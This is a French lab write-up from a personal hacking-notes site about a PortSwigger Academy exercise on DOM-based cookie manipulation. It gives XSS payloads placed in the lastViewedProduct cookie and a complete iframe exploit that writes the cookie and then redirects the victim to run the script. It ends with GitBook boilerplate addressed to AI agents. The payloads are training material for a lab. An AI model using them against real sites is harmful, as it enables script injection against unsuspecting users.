> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/dom/dom-based-cookie-manipulation.md).

# Manipulation de cookies côté DOM

### Manipulation de cookies basée sur le DOM

Ce laboratoire montre une manipulation côté client (DOM) des cookies permettant d'injecter une valeur dans le `lastViewedProduct` cookie. Modifier cette valeur peut provoquer une exécution de contenu (XSS) sur une autre page et appeler la `print()` fonction. L'exploitation se fait en redirigeant la victime via le serveur d'exploitation vers les pages nécessaires.

* Il existe un cookie de session nommé `lastViewedProduct` qui contient le lien du dernier produit consulté.

<figure><img src="/files/5c2f2f15edb552e78052f12679cb5eac5393e28e" alt=""><figcaption></figcaption></figure>

* Sur la page, il y a une section « Last viewed product » avec un lien tel que `&lt;a href=".../product?productId=1"&gt;Dernier produit consulté&lt;/a&gt;`.

<figure><img src="/files/d17f59f0fe4f322654781611ef8dd08c49153f19" alt=""><figcaption></figcaption></figure>

* En modifiant la valeur stockée comme « dernière page consultée », le lien affiché peut être interprété comme du HTML/JS.
* En remplaçant la valeur du cookie par une URL externe (`https://jord4n.pro`) le lien redirige vers ce site.

<figure><img src="/files/5f12204508458447698b6f8baf3a8fae273ddf5e" alt=""><figcaption></figcaption></figure>

L'insertion de `JavaScript:print()` dans la valeur est interprétée par le navigateur dans ce contexte.

<figure><img src="/files/eed4fe730241bcf307a811eefff9eecd5a03ccb9" alt=""><figcaption></figcaption></figure>

* En injectant une charge utile contenant du HTML, par exemple `productId=1&'><h1>TEST</h1>`, le contenu s'affiche.

{% code overflow="wrap" %}

```html
<a href="https://0a73004204b35bb980b9218200c90043.web-security-academy.net/product?productId=1">Dernier produit consulté</a>
```

{% endcode %}

<figure><img src="/files/ece75e0668795c5d29757f3343b6b71d0b7244db" alt=""><figcaption></figcaption></figure>

Une charge utile de script comme `productId=1&'><script>print()</script>` est également interprétée et déclenchée `print()`.

```
productId=1&'><script>print()</script>
```

<figure><img src="/files/477192f77b50eed6a9872fe8d89281cf08f79aae" alt=""><figcaption></figcaption></figure>

1. Stockez chez la victime dans son `lastViewedProduct` cookie une valeur contenant l'injection (la page produit est utilisée pour enregistrer cette valeur).
2. Puis redirigez la victime vers la page d'accueil (ou la page qui affiche « Dernier produit consulté ») afin que la valeur mal formée soit renvoyée et exécute le script (`print()`).
3. Utilisez le serveur d'exploitation pour orchestrer la redirection vers la page produit (qui écrit le cookie), puis vers la page où le cookie est affiché.

{% code overflow="wrap" %}

```javascript
<iframe src="https://0a73004204b35bb980b9218200c90043.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x){this.src='https://0a73004204b35bb980b9218200c90043.web-security-academy.net/'; window.x=1;}"></iframe>
```

{% endcode %}

<figure><img src="/files/6c80b4e7145bf4d78b85cb3c7f589ce67c27491c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/dom/dom-based-cookie-manipulation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
